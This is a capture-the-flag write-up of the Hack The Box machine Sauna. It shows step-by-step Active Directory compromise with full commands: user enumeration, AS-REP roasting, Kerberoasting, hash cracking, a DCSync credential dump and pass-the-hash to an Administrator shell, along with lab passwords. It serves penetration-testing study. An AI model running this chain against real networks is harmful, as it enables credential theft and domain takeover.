Sauna Writeup

07 January 2023 #CTF #HTB #box #easy #windows

sauna info


A bit hot in there isn't it? A good nmap scan will cool us down:

$ sudo nmap -n -Pn -sCV -oN enum/initial.nmap
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-01-08 06:22:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-01-08T06:22:11
|_  start_date: N/A
|_clock-skew: 7h00m00s

From this scan result, we can safely say that the box is an Active Directory domain controller (DNS + Kerberos + LDAP). We get the domain name which is egotistical-bank.local (casing doesn't matter) and the hostname of the box which is sauna. We should add all of this to our /etc/hosts file.


DNS is listening on TCP, so we should try a zone transfer:

$ dig @ axfr egotistical-bank.local

; <<>> DiG 9.18.8-1-Debian <<>> @ axfr egotistical-bank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
$ dig @ axfr sauna.egotistical-bank.local

; <<>> DiG 9.18.8-1-Debian <<>> @ axfr sauna.egotistical-bank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.

Unlucky... Nice try tho.


Let's see if we can list shares anonymously:

$ smbclient -NL
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Doesn't look like we can.

Next we'll try to use rpcclient to dump users:

$ rpcclient -NU ''
rpcclient $> enumdomusers

Once again, we are denied access (same for all other RCP commands).


We get a standard home page with mostly lorem ipsum:


This seems like a static website with only html pages. Let's get some directory bruteforcing going for good mesure:

$ gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -o enum/root.dir -x html,txt
/images               (Status: 301) [Size: 150] [-->]
/index.html           (Status: 200) [Size: 32797]
/css                  (Status: 301) [Size: 147] [-->]
/contact.html         (Status: 200) [Size: 15634]
/blog.html            (Status: 200) [Size: 24695]
/about.html           (Status: 200) [Size: 30954]
/.                    (Status: 200) [Size: 32797]
/fonts                (Status: 301) [Size: 149] [-->]
/single.html          (Status: 200) [Size: 38059]

Nothing new is found.

In /about.html we find potential usernames:


Username Enumeration

With these names, we can build a username list using common mutations:

Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver




Let's use kerbrute to test if we have any valid username:

$ kerbrute userenum --dc -d egotistical-bank.local users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/08/23 - Ronnie Flathers @ropnop

2023/01/08 00:58:26 >  Using KDC(s):
2023/01/08 00:58:26 >

2023/01/08 00:58:26 >  [+] VALID USERNAME:       fsmith@egotistical-bank.local
2023/01/08 00:58:26 >  Done! Tested 24 usernames (1 valid) in 0.090 seconds

Nice, we have validated that the 'fsmith' account actually exists in the domain.


With a valid username, we can see if Kerberos Pre-Authentication is disabled for that account. If it is, we can request a TGT for that user without their password. The TGT is encrypted with the NTLM hash of the password for that user account. We can then grab this hash and crack it offline. This is commonly known as AS-REP roasting.

We'll use the GetNPUsers script from impacket to do that:

$ impacket-GetNPUsers -usersfile <(echo 'fsmith') egotistical-bank.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation


<(echo 'fsmith') creates a temporary file (not on disk) that contains the output of the command between parentheses (only works with bash and zsh).

Great! We grabed a hash. Time to crack it with hashcat:

$ hashcat hash.txt /usr/share/wordlists/rockyou.txt

Now that we have a password, we can try loging in via WinRM:

$ crackmapexec winrm -u fsmith -p Thestrokes23
SMB    5985   SAUNA      [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP    5985   SAUNA      [*]
WINRM    5985   SAUNA      [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

Yes we can! Let's use evil-winrm:

$ evil-winrm -i -u fsmith -p Thestrokes23 
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami



With a valid domain account, we unlock the possibility to use BloodHound to enumerate the domain.

Grab the latest release of SharpHound (the default ingestor) from Github. Then we need to get the binary on the target box. We'll use the upload feature of evil-winrm to do it:

*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /opt/SharpHound/SharpHound.exe .

Then we'll run the executable and use all collection methods:

*Evil-WinRM* PS C:\Users\FSmith\Documents> ./SharpHound.exe -c all

The results of are stored in a zip archive. Let's use the download feature of evil-winrm to transfer it to our attack box:

*Evil-WinRM* PS C:\Users\FSmith\Documents> ls

    Directory: C:\Users\FSmith\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         1/8/2023   6:01 PM          11609
-a----         1/8/2023   5:55 PM        1051648 SharpHound.exe
-a----         1/8/2023   6:01 PM           8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin

*Evil-WinRM* PS C:\Users\FSmith\Documents> download /home/yep/CTF/HTB/machines/sauna/bloodhound/

Then just unzip it, drag and drop the json files into BloodHound's window and mark the 'fsmith' account as owned:

mark as owned

The 'Shortest Paths to Domain Admins from Owned Principals' query returns nothing. Next we can try to list all Kerberoastable accounts:

list all Kerberoastable accounts


We don't care about the 'krbtgt' account because its password is randomly generated and is roughly 128 bytes (so very to crack).

However can try with this 'hsmith' account (second 'smith' already).

The reason this user account is Kerberoastable is because it has a SPN (Service Principal Name) associated to it. SPNs are used to identify service instances on a domain. We can request a ticket (TGS) for that service and, as we know, tickets are encrypted using the NTLM hash of the password for that account, which we will try to crack.

Once again, impacket to the rescue:

$ impacket-GetUserSPNs egotistical-bank.local/fsmith:Thestrokes23 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 06:54:34.140321  <never>               

[-] CCache file is not found. Skipping...

If you run into a KRB_AP_ERR_SKEW(Clock skew too great) error, try running
sudo ntpdate to sync time between the box and your VM.

Let's fire up hashcat again to crack this new hash:

$ hashcat hash.txt /usr/share/wordlists/rockyou.txt

It's the same password lol...


This 'hsmith' account leads us nowhere so we'll take a step back and perform some more local enumeration with winpeas:

Looking for AutoLogon credentials                                                                                                                                                
    Some AutoLogon credentials were found                                                                                                                                                     
    DefaultDomainName             :  EGOTISTICALBANK                                                                                                                                          
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager                                                                                                                          
    DefaultPassword               :  Moneymakestheworldgoround!

We find another set of creds. If we look this account up on BloodHound, we get some interesting results:

outbound object control

Note that the account name is 'svc_loanmgr' and not 'svc_loanmanager'.

It has rights to DCSync on the domain.


DCSync is an attack that allows us to retrieve password hashes from the Active Directory database (NTDS.DIT). It is normaly used to replicate data between domain controllers.

the secretsdump script from impacket (i love impacket) is able to perform that attack remotely (otherwise we could use mimikatz on the target box):

$ impacket-secretsdump 'egotistical-bank.local/svc_loanmgr:Moneymakestheworldgoround!@'  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Pass the Hash as Administrator

With the Administrator hash, we can use wmiexec or psexec to get a shell on the box as Administrator (or NT AUTHORITY\SYSTEM):

$ impacket-wmiexec egotistical-bank.local/Administrator@ -hashes :823452073d75b9d1cf70ebdf86c7f98e      
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

Key Takeaways